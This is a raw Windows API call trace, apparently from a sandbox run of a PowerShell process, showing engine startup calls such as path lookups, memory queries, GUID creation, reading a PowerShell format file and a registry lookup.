	[0142.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c530, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.464] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c480, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0142.876] VirtualQuery (in: lpAddress=0x14ba40, lpBuffer=0x14c900, dwLength=0x30 | out: lpBuffer=0x14c900*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.876] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xb72ed29, Data2=0xe666, Data3=0x4284, Data4=([0]=0xac, [1]=0x1c, [2]=0x93, [3]=0x88, [4]=0xd9, [5]=0x20, [6]=0x4a, [7]=0xa9))) returned 0x0
	[0142.878] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xf4fa9122, Data2=0x11fc, Data3=0x4acb, Data4=([0]=0x9f, [1]=0xbe, [2]=0x95, [3]=0x50, [4]=0x22, [5]=0x9d, [6]=0xf6, [7]=0xc4))) returned 0x0
	[0142.879] VirtualQuery (in: lpAddress=0x14bbf0, lpBuffer=0x14cab0, dwLength=0x30 | out: lpBuffer=0x14cab0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.880] VirtualQuery (in: lpAddress=0x14bbf0, lpBuffer=0x14cab0, dwLength=0x30 | out: lpBuffer=0x14cab0*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.881] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x3022ecde, Data2=0x1ea2, Data3=0x4b4c, Data4=([0]=0x97, [1]=0xd3, [2]=0xbf, [3]=0x39, [4]=0xa3, [5]=0x34, [6]=0x4d, [7]=0x57))) returned 0x0
	[0142.885] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x77c845f9, Data2=0x32d5, Data3=0x4f49, Data4=([0]=0xbb, [1]=0x2c, [2]=0xb3, [3]=0xcf, [4]=0x99, [5]=0x49, [6]=0x81, [7]=0x9d))) returned 0x0
	[0142.885] VirtualQuery (in: lpAddress=0x14be40, lpBuffer=0x14cd00, dwLength=0x30 | out: lpBuffer=0x14cd00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.886] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.886] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.886] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xd94efaf7, Data2=0xed82, Data3=0x42b0, Data4=([0]=0x98, [1]=0x1b, [2]=0x86, [3]=0xa2, [4]=0xf0, [5]=0xf4, [6]=0xef, [7]=0x46))) returned 0x0
	[0142.887] VirtualQuery (in: lpAddress=0x14be40, lpBuffer=0x14cd00, dwLength=0x30 | out: lpBuffer=0x14cd00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.887] VirtualQuery (in: lpAddress=0x14bc60, lpBuffer=0x14cb20, dwLength=0x30 | out: lpBuffer=0x14cb20*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.887] VirtualQuery (in: lpAddress=0x14b4b0, lpBuffer=0x14c370, dwLength=0x30 | out: lpBuffer=0x14c370*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.887] VirtualQuery (in: lpAddress=0x14b4b0, lpBuffer=0x14c370, dwLength=0x30 | out: lpBuffer=0x14c370*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0142.888] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x174903b3, Data2=0x666b, Data3=0x434a, Data4=([0]=0x83, [1]=0xd9, [2]=0x62, [3]=0xc7, [4]=0x73, [5]=0x7b, [6]=0x3f, [7]=0xae))) returned 0x0
	[0142.888] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x37754965, Data2=0xd099, Data3=0x4d18, Data4=([0]=0x99, [1]=0xf, [2]=0x3c, [3]=0x3a, [4]=0x6, [5]=0xe6, [6]=0x33, [7]=0x9f))) returned 0x0
	[0142.888] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14c990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0142.888] SetErrorMode (uMode=0x1) returned 0x1
	[0142.889] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x31c
	[0142.889] GetFileType (hFile=0x31c) returned 0x1
	[0142.889] SetErrorMode (uMode=0x1) returned 0x1
	[0142.889] GetFileType (hFile=0x31c) returned 0x1
	[0142.889] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.890] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.891] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.891] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.892] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.892] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.893] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.893] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.894] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.894] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.894] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.895] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.895] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.895] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.896] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0142.896] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.004] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x1000, lpOverlapped=0x0) returned 1
	[0143.004] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0xbce, lpOverlapped=0x0) returned 1
	[0143.004] ReadFile (in: hFile=0x31c, lpBuffer=0x3594f2e, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x3594f2e*, lpNumberOfBytesRead=0x14cf18*=0x0, lpOverlapped=0x0) returned 1
	[0143.004] ReadFile (in: hFile=0x31c, lpBuffer=0x35957f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x14cf18, lpOverlapped=0x0 | out: lpBuffer=0x35957f8*, lpNumberOfBytesRead=0x14cf18*=0x0, lpOverlapped=0x0) returned 1
	[0143.005] CloseHandle (hObject=0x31c) returned 1
	[0143.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cc60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0143.005] SetErrorMode (uMode=0x1) returned 0x1
	[0143.005] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x14cec0 | out: lpFileInformation=0x14cec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0143.005] SetErrorMode (uMode=0x1) returned 0x1
	[0143.005] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0143.006] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x14cfa8 | out: phkResult=0x14cfa8*=0x31c) returned 0x0
	[0143.006] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cf2c, lpData=0x0, lpcbData=0x14cf28*=0x0 | out: lpType=0x14cf2c*=0x1, lpData=0x0, lpcbData=0x14cf28*=0x56) returned 0x0
	[0143.006] CoTaskMemAlloc (cb=0x5a) returned 0x1b7d5ac0
	[0143.006] RegQueryValueExW (in: hKey=0x31c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x14cefc, lpData=0x1b7d5ac0, lpcbData=0x14cef8*=0x56 | out: lpType=0x14cefc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x14cef8*=0x56) returned 0x0
	[0143.006] CoTaskMemFree (pv=0x1b7d5ac0) 
	[0143.006] RegCloseKey (hKey=0x31c) returned 0x0
	[0143.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14cbf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0143.006] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x14caa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0143.028] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xf4c02848, Data2=0x26ac, Data3=0x4af5, Data4=([0]=0x9b, [1]=0xfa, [2]=0xb2, [3]=0x36, [4]=0xde, [5]=0xc0, [6]=0xc5, [7]=0x2a))) returned 0x0
	[0143.030] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xeb8a0fe3, Data2=0xd2a6, Data3=0x4057, Data4=([0]=0xa9, [1]=0xe9, [2]=0x47, [3]=0x11, [4]=0x2a, [5]=0x5a, [6]=0x72, [7]=0xd4))) returned 0x0
	[0143.030] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x7ae2080b, Data2=0xcf93, Data3=0x44c3, Data4=([0]=0x94, [1]=0x10, [2]=0xa3, [3]=0x6, [4]=0xc6, [5]=0xc8, [6]=0x9e, [7]=0x28))) returned 0x0
	[0143.031] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x1dad55f8, Data2=0x107d, Data3=0x4293, Data4=([0]=0xbc, [1]=0x4d, [2]=0xb9, [3]=0xfc, [4]=0xb8, [5]=0x2c, [6]=0xfa, [7]=0xa5))) returned 0x0
	[0143.032] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x25ff70b, Data2=0x70e, Data3=0x4ac1, Data4=([0]=0x87, [1]=0x66, [2]=0x84, [3]=0xfd, [4]=0x43, [5]=0x1e, [6]=0x3a, [7]=0xff))) returned 0x0
	[0143.032] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x45d5879f, Data2=0xba78, Data3=0x4cb1, Data4=([0]=0x98, [1]=0xc1, [2]=0x7e, [3]=0xa4, [4]=0x86, [5]=0x4b, [6]=0x9f, [7]=0x82))) returned 0x0
	[0143.033] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.034] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xe4620b0c, Data2=0x7065, Data3=0x4b79, Data4=([0]=0x81, [1]=0x58, [2]=0x40, [3]=0x6d, [4]=0x9f, [5]=0x3e, [6]=0x8a, [7]=0x80))) returned 0x0
	[0143.035] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.036] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.037] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x2951aaa6, Data2=0x6663, Data3=0x41a0, Data4=([0]=0xa2, [1]=0x73, [2]=0x72, [3]=0x1c, [4]=0xb7, [5]=0xfe, [6]=0x2b, [7]=0xe0))) returned 0x0
	[0143.140] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x14a4aa57, Data2=0xa2b8, Data3=0x4ac2, Data4=([0]=0xa4, [1]=0xa1, [2]=0x9, [3]=0x56, [4]=0xe6, [5]=0xb3, [6]=0x4a, [7]=0xca))) returned 0x0
	[0143.140] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x69cc006b, Data2=0xca31, Data3=0x4078, Data4=([0]=0x99, [1]=0xfe, [2]=0x8d, [3]=0xc2, [4]=0x7c, [5]=0x7e, [6]=0x2c, [7]=0x73))) returned 0x0
	[0143.141] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x458191aa, Data2=0xfb4c, Data3=0x4431, Data4=([0]=0x81, [1]=0xd0, [2]=0x3e, [3]=0x63, [4]=0xc8, [5]=0x82, [6]=0xea, [7]=0x81))) returned 0x0
	[0143.141] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.141] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x79350d7e, Data2=0xf6fd, Data3=0x4ee3, Data4=([0]=0xb1, [1]=0xc4, [2]=0x82, [3]=0xac, [4]=0xd6, [5]=0x93, [6]=0x16, [7]=0x27))) returned 0x0
	[0143.141] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.142] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.142] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.142] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.142] VirtualQuery (in: lpAddress=0x14bb80, lpBuffer=0x14ca40, dwLength=0x30 | out: lpBuffer=0x14ca40*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.143] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x75b4f072, Data2=0x63d, Data3=0x4fa5, Data4=([0]=0x93, [1]=0xbb, [2]=0xa0, [3]=0x1, [4]=0x1f, [5]=0x88, [6]=0x23, [7]=0x5))) returned 0x0
	[0143.143] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x6d9947b, Data2=0x77ac, Data3=0x4aef, Data4=([0]=0x9d, [1]=0xd3, [2]=0xcc, [3]=0xed, [4]=0x17, [5]=0x0, [6]=0xfa, [7]=0x87))) returned 0x0
	[0143.143] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x7adde728, Data2=0x55c1, Data3=0x4396, Data4=([0]=0x80, [1]=0x26, [2]=0xf6, [3]=0x38, [4]=0x8f, [5]=0x2d, [6]=0x14, [7]=0x25))) returned 0x0
	[0143.143] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x891796c8, Data2=0x77c6, Data3=0x4049, Data4=([0]=0xa2, [1]=0xe2, [2]=0xc5, [3]=0xa1, [4]=0x49, [5]=0xdc, [6]=0x1d, [7]=0x53))) returned 0x0
	[0143.144] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x8d6e79a3, Data2=0x322e, Data3=0x4366, Data4=([0]=0x9c, [1]=0xf1, [2]=0x4e, [3]=0x50, [4]=0xae, [5]=0x25, [6]=0xe9, [7]=0x4b))) returned 0x0
	[0143.144] VirtualQuery (in: lpAddress=0x14be40, lpBuffer=0x14cd00, dwLength=0x30 | out: lpBuffer=0x14cd00*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0143.144] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x285bb1f9, Data2=0xa7d3, Data3=0x4b40, Data4=([0]=0xbc, [1]=0xb7, [2]=0x53, [3]=0xf8, [4]=0xdf, [5]=0xeb, [6]=0x50, [7]=0xd6))) returned 0x0
	[0143.144] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x683229a7, Data2=0x984, Data3=0x4a83, Data4=([0]=0xa8, [1]=0x8d, [2]=0xff, [3]=0x21, [4]=0xf3, [5]=0x6e, [6]=0x9f, [7]=0x3c))) returned 0x0
	[0143.145] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x17f1559c, Data2=0x43dd, Data3=0x4f0a, Data4=([0]=0x89, [1]=0x91, [2]=0x1, [3]=0x57, [4]=0xc4, [5]=0xc0, [6]=0x26, [7]=0x5e))) returned 0x0
	[0143.145] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xba79119e, Data2=0xd618, Data3=0x4aae, Data4=([0]=0xad, [1]=0x90, [2]=0x6c, [3]=0x32, [4]=0x24, [5]=0x42, [6]=0x99, [7]=0xa3))) returned 0x0
	[0143.145] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xfd49abb9, Data2=0xd2c4, Data3=0x4c48, Data4=([0]=0x8b, [1]=0x5c, [2]=0x43, [3]=0xbf, [4]=0xfa, [5]=0x36, [6]=0x9a, [7]=0x7c))) returned 0x0
	[0143.146] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x82f26c8, Data2=0xe394, Data3=0x4d69, Data4=([0]=0x94, [1]=0x52, [2]=0xdb, [3]=0xa9, [4]=0x65, [5]=0xc0, [6]=0x16, [7]=0xd4))) returned 0x0
	[0143.146] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0xf0ecad91, Data2=0xd9ce, Data3=0x4328, Data4=([0]=0xa2, [1]=0x4a, [2]=0x6b, [3]=0xe2, [4]=0x52, [5]=0x73, [6]=0x26, [7]=0x91))) returned 0x0
	[0143.146] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x59da15cb, Data2=0xd9ea, Data3=0x40cd, Data4=([0]=0xa6, [1]=0x80, [2]=0x8a, [3]=0x92, [4]=0x1a, [5]=0xe7, [6]=0xd5, [7]=0x46))) returned 0x0
	[0143.146] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x9cd1b3b4, Data2=0x23ae, Data3=0x4c81, Data4=([0]=0x98, [1]=0x26, [2]=0x6, [3]=0xc, [4]=0xee, [5]=0xff, [6]=0x9a, [7]=0x22))) returned 0x0
	[0143.147] CoCreateGuid (in: pguid=0x14d1d0 | out: pguid=0x14d1d0*(Data1=0x2b6f8bc0, Data2=0xb851, Data3=0x464a, Data4=([0]=0xb2, [1]=0x54, [2]=0x3f, [3]=0x1a, [4]=0x17, [5]=0xae, [6]=0xb, [7]=0x3f))) returned 0x0
